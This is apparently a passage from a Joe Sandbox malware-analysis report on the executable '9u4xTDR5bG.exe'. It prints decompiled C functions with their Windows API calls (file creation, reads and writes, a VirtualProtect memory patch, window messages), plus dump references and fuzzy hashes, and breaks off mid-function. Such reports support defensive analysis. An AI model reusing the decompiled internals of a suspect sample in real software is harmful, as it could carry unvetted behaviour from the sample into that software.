                                                  • GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\9u4xTDR5bG.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                  • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                  • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                  • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00406008(WCHAR* _a4) {
                                                  				signed char _t3;
                                                  				signed char _t7;
                                                  
                                                  				_t3 = GetFileAttributesW(_a4); // executed
                                                  				_t7 = _t3;
                                                  				if(_t7 != 0xffffffff) {
                                                  					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                                                  				}
                                                  				return _t7;
                                                  			}





                                                  0x0040600d
                                                  0x00406013
                                                  0x00406018
                                                  0x00406021
                                                  0x00406021
                                                  0x0040602a

                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406021
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                  • Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
                                                  • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                  • Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00405AEB(WCHAR* _a4) {
                                                  				int _t2;
                                                  
                                                  				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                  				if(_t2 == 0) {
                                                  					return GetLastError();
                                                  				}
                                                  				return 0;
                                                  			}




                                                  0x00405af1
                                                  0x00405af9
                                                  0x00000000
                                                  0x00405aff
                                                  0x00000000

                                                  APIs
                                                  • CreateDirectoryW.KERNELBASE(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                  • GetLastError.KERNEL32 ref: 00405AFF
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                  • Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
                                                  • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                  • Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 51%
                                                  			E73202B98(void* __ecx, intOrPtr _a4) {
                                                  				signed int _v8;
                                                  				void* _t28;
                                                  				void* _t29;
                                                  				int _t33;
                                                  				void* _t37;
                                                  				void* _t40;
                                                  				void* _t45;
                                                  				void* _t49;
                                                  				signed int _t56;
                                                  				void* _t61;
                                                  				void* _t70;
                                                  				intOrPtr _t72;
                                                  				signed int _t77;
                                                  				intOrPtr _t79;
                                                  				intOrPtr _t80;
                                                  				void* _t81;
                                                  				void* _t87;
                                                  				void* _t88;
                                                  				void* _t89;
                                                  				void* _t90;
                                                  				intOrPtr _t93;
                                                  				intOrPtr _t94;
                                                  
                                                  				if( *0x73205050 != 0 && E73202ADB(_a4) == 0) {
                                                  					 *0x73205054 = _t93;
                                                  					if( *0x7320504c != 0) {
                                                  						_t93 =  *0x7320504c;
                                                  					} else {
                                                  						E732030C0(E73202AD5(), __ecx);
                                                  						 *0x7320504c = _t93;
                                                  					}
                                                  				}
                                                  				_t28 = E73202B09(_a4);
                                                  				_t94 = _t93 + 4;
                                                  				if(_t28 <= 0) {
                                                  					L9:
                                                  					_t29 = E73202AFD();
                                                  					_t72 = _a4;
                                                  					_t79 =  *0x73205058;
                                                  					 *((intOrPtr*)(_t29 + _t72)) = _t79;
                                                  					 *0x73205058 = _t72;
                                                  					E73202AF7();
                                                  					_t33 = FindCloseChangeNotification(??); // executed
                                                  					 *0x73205034 = _t33;
                                                  					 *0x73205038 = _t79;
                                                  					if( *0x73205050 != 0 && E73202ADB( *0x73205058) == 0) {
                                                  						 *0x7320504c = _t94;
                                                  						_t94 =  *0x73205054;
                                                  					}
                                                  					_t80 =  *0x73205058;
                                                  					_a4 = _t80;
                                                  					 *0x73205058 =  *((intOrPtr*)(E73202AFD() + _t80));
                                                  					_t37 = E73202AE9(_t80);
                                                  					_pop(_t81);
                                                  					if(_t37 != 0) {
                                                  						_t40 = E73202B09(_t81);
                                                  						if(_t40 > 0) {
                                                  							_push(_t40);
                                                  							_push(E73202B14() + _a4 + _v8);
                                                  							_push(E73202B1E());
                                                  							if( *0x73205050 <= 0 || E73202ADB(_a4) != 0) {
                                                  								_pop(_t88);
                                                  								_pop(_t45);
                                                  								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
                                                  								if(__eflags == 0) {
                                                  								}
                                                  								asm("loop 0xfffffff5");
                                                  							} else {
                                                  								_pop(_t89);
                                                  								_pop(_t49);
                                                  								 *0x7320504c =  *0x7320504c +  *(_t89 + _t49) * 4;
                                                  								asm("loop 0xffffffeb");
                                                  							}
                                                  						}
                                                  					}
                                                  					_t107 =  *0x73205058;
                                                  					if( *0x73205058 == 0) {
                                                  						 *0x7320504c = 0;
                                                  					}
                                                  					E73202B42(_t107, _a4,  *0x73205034,  *0x73205038);
                                                  					return _a4;
                                                  				}
                                                  				_push(E73202B14() + _a4);
                                                  				_t56 = E73202B1A();
                                                  				_v8 = _t56;
                                                  				_t77 = _t28;
                                                  				_push(_t68 + _t56 * _t77);
                                                  				_t70 = E73202B26();
                                                  				_t87 = E73202B22();
                                                  				_t90 = E73202B1E();
                                                  				_t61 = _t77;
                                                  				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
                                                  					_push( *((intOrPtr*)(_t70 + _t61)));
                                                  				}
                                                  				_push( *((intOrPtr*)(_t87 + _t61)));
                                                  				asm("loop 0xfffffff1");
                                                  				goto L9;
                                                  			}

























                                                  0x73202ba8
                                                  0x73202bb9
                                                  0x73202bc6
                                                  0x73202bda
                                                  0x73202bc8
                                                  0x73202bcd
                                                  0x73202bd2
                                                  0x73202bd2
                                                  0x73202bc6
                                                  0x73202be3
                                                  0x73202be8
                                                  0x73202bee
                                                  0x73202c32
                                                  0x73202c32
                                                  0x73202c37
                                                  0x73202c3c
                                                  0x73202c42
                                                  0x73202c44
                                                  0x73202c4a
                                                  0x73202c57
                                                  0x73202c59
                                                  0x73202c5e
                                                  0x73202c6b
                                                  0x73202c7e
                                                  0x73202c84
                                                  0x73202c8a
                                                  0x73202c8b
                                                  0x73202c91
                                                  0x73202c9d
                                                  0x73202ca3
                                                  0x73202cab
                                                  0x73202cac
                                                  0x73202caf
                                                  0x73202cba
                                                  0x73202cbc
                                                  0x73202cc8
                                                  0x73202cce
                                                  0x73202cd6
                                                  0x73202d02
                                                  0x73202d03
                                                  0x73202d05
                                                  0x73202d09
                                                  0x73202d09
                                                  0x73202d10
                                                  0x73202ce6
                                                  0x73202ce6
                                                  0x73202ce7
                                                  0x73202cf5
                                                  0x73202cfe
                                                  0x73202cfe
                                                  0x73202cd6
                                                  0x73202cba
                                                  0x73202d12
                                                  0x73202d19
                                                  0x73202d1b
                                                  0x73202d1b
                                                  0x73202d34
                                                  0x73202d42
                                                  0x73202d42
                                                  0x73202bf9
                                                  0x73202bfa
                                                  0x73202bff
                                                  0x73202c03
                                                  0x73202c08
                                                  0x73202c1c
                                                  0x73202c1d
                                                  0x73202c1e
                                                  0x73202c20
                                                  0x73202c25
                                                  0x73202c27
                                                  0x73202c27
                                                  0x73202c2a
                                                  0x73202c30
                                                  0x00000000

                                                  APIs
                                                  • FindCloseChangeNotification.KERNELBASE(00000000), ref: 73202C57
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.764451858.0000000073201000.00000020.00000001.01000000.00000004.sdmp, Offset: 73200000, based on PE: true
                                                  • Associated: 00000000.00000002.764445556.0000000073200000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.764465355.0000000073204000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.764476426.0000000073206000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73200000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: ChangeCloseFindNotification
                                                  • String ID:
                                                  • API String ID: 2591292051-0
                                                  • Opcode ID: e639dba0688dfd921fbca75448d18927a91b8370eb6ea678b4a19c3e6e53d9ad
                                                  • Instruction ID: d3b5b40ad41328d8aa44c7375072cb6ba0e37e34de3fc6cd98ee10d56c51c9cf
                                                  • Opcode Fuzzy Hash: e639dba0688dfd921fbca75448d18927a91b8370eb6ea678b4a19c3e6e53d9ad
                                                  • Instruction Fuzzy Hash: 3E4193B250830DDFEB11EF65DA88B5D777AEB48318F30C427E809D6140DA7998CCAB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004060DF(void* _a4, void* _a8, long _a12) {
                                                  				int _t7;
                                                  				long _t11;
                                                  
                                                  				_t11 = _a12;
                                                  				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                  				if(_t7 == 0 || _t11 != _a12) {
                                                  					return 0;
                                                  				} else {
                                                  					return 1;
                                                  				}
                                                  			}





                                                  0x004060e3
                                                  0x004060f3
                                                  0x004060fb
                                                  0x00000000
                                                  0x00406102
                                                  0x00000000
                                                  0x00406104

                                                  APIs
                                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 004060F3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: FileWrite
                                                  • String ID:
                                                  • API String ID: 3934441357-0
                                                  • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                  • Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
                                                  • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                  • Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004060B0(void* _a4, void* _a8, long _a12) {
                                                  				int _t7;
                                                  				long _t11;
                                                  
                                                  				_t11 = _a12;
                                                  				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                  				if(_t7 == 0 || _t11 != _a12) {
                                                  					return 0;
                                                  				} else {
                                                  					return 1;
                                                  				}
                                                  			}





                                                  0x004060b4
                                                  0x004060c4
                                                  0x004060cc
                                                  0x00000000
                                                  0x004060d3
                                                  0x00000000
                                                  0x004060d5

                                                  APIs
                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                  • Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
                                                  • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                  • Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                  
                                                  				 *0x73205048 = _a4;
                                                  				if(_a8 == 1) {
                                                  					VirtualProtect(0x7320505c, 4, 0x40, 0x7320504c); // executed
                                                  					 *0x7320505c = 0xc2;
                                                  					 *0x7320504c = 0;
                                                  					 *0x73205054 = 0;
                                                  					 *0x73205068 = 0;
                                                  					 *0x73205058 = 0;
                                                  					 *0x73205050 = 0;
                                                  					 *0x73205060 = 0;
                                                  					 *0x7320505e = 0;
                                                  				}
                                                  				return 1;
                                                  			}



                                                  0x73202a88
                                                  0x73202a8d
                                                  0x73202a9d
                                                  0x73202aa5
                                                  0x73202aac
                                                  0x73202ab1
                                                  0x73202ab6
                                                  0x73202abb
                                                  0x73202ac0
                                                  0x73202ac5
                                                  0x73202aca
                                                  0x73202aca
                                                  0x73202ad2

                                                  APIs
                                                  • VirtualProtect.KERNELBASE(7320505C,00000004,00000040,7320504C), ref: 73202A9D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.764451858.0000000073201000.00000020.00000001.01000000.00000004.sdmp, Offset: 73200000, based on PE: true
                                                  • Associated: 00000000.00000002.764445556.0000000073200000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.764465355.0000000073204000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.764476426.0000000073206000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_73200000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: cb5b4870ffc87786bd606c09d890880b802cdf3a2eb6468ecac6350c00f2ae8a
                                                  • Instruction ID: 735124e83fb2d28cf1d771a1a152b252fe86d5a048d275f16069767c7fec785f
                                                  • Opcode Fuzzy Hash: cb5b4870ffc87786bd606c09d890880b802cdf3a2eb6468ecac6350c00f2ae8a
                                                  • Instruction Fuzzy Hash: FEF07FF2509380DED350EB2A864870E3BE6A70C20DB34E52AA19CD6641E334448CAF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004044E5(int _a4) {
                                                  				struct HWND__* _t2;
                                                  				long _t3;
                                                  
                                                  				_t2 =  *0x433ed8;
                                                  				if(_t2 != 0) {
                                                  					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
                                                  					return _t3;
                                                  				}
                                                  				return _t2;
                                                  			}





                                                  0x004044e5
                                                  0x004044ec
                                                  0x004044f7
                                                  0x00000000
                                                  0x004044f7
                                                  0x004044fd

                                                  APIs
                                                  • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                  • Instruction ID: 729772cd993a62bf3dcd5a53f5ba0c6067f9c4589e443fe2cdcdd0dddf41cb53
                                                  • Opcode Fuzzy Hash: b985a0028b3d47d2300e38cb49a9103195f452c5c5dca8052d978926f7780193
                                                  • Instruction Fuzzy Hash: 74C04CB1740605BADA108B509D45F0677546750701F188429B641A50E0CA74E410D62C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004044CE(int _a4) {
                                                  				long _t2;
                                                  
                                                  				_t2 = SendMessageW( *0x434f08, 0x28, _a4, 1); // executed
                                                  				return _t2;
                                                  			}




                                                  0x004044dc
                                                  0x004044e2

                                                  APIs
                                                  • SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                  • Instruction ID: f9270ce27bc2d5d500308faa7c43699bdd9cec228278350af1c7ef3a72e6c056
                                                  • Opcode Fuzzy Hash: ea04ea026f55595d688d74c1d87789f1c1942be7a89ca5b988cfd0b6025de892
                                                  • Instruction Fuzzy Hash: 4FB01235181A00FBDE514B00DE09F857E62F7E4701F058038F341240F0CBB200A4DB08
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004034E5(long _a4) {
                                                  				long _t2;
                                                  
                                                  				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                  				return _t2;
                                                  			}




                                                  0x004034f3
                                                  0x004034f9

                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,0040387D,?), ref: 004034F3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: FilePointer
                                                  • String ID:
                                                  • API String ID: 973152223-0
                                                  • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                  • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                  • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                  • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004044BB(int _a4) {
                                                  				int _t2;
                                                  
                                                  				_t2 = EnableWindow( *0x42d264, _a4); // executed
                                                  				return _t2;
                                                  			}




                                                  0x004044c5
                                                  0x004044cb

                                                  APIs
                                                  • KiUserCallbackDispatcher.NTDLL(?,00404292), ref: 004044C5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.763702493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.763682035.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763734137.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763752126.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763863813.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763876966.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763912183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763932066.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.763966847.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_9u4xTDR5bG.jbxd
                                                  Similarity
                                                  • API ID: CallbackDispatcherUser
                                                  • String ID:
                                                  • API String ID: 2492992576-0
                                                  • Opcode ID: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                  • Instruction ID: 0db23a64e3c973129ccb7351ad80e5cfa0365495cc8a336c35755b545d17f2be
                                                  • Opcode Fuzzy Hash: 88c3b14432b04161d4e03979afc52f71aef4d1a500ec292a4d39f98dda9e77ac
                                                  • Instruction Fuzzy Hash: 74A00275508601DBDE115B51DF09D057B71A7547017414579A18551034C6314461EB5D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E732012BB() {
                                                  				void* _t3;
                                                  
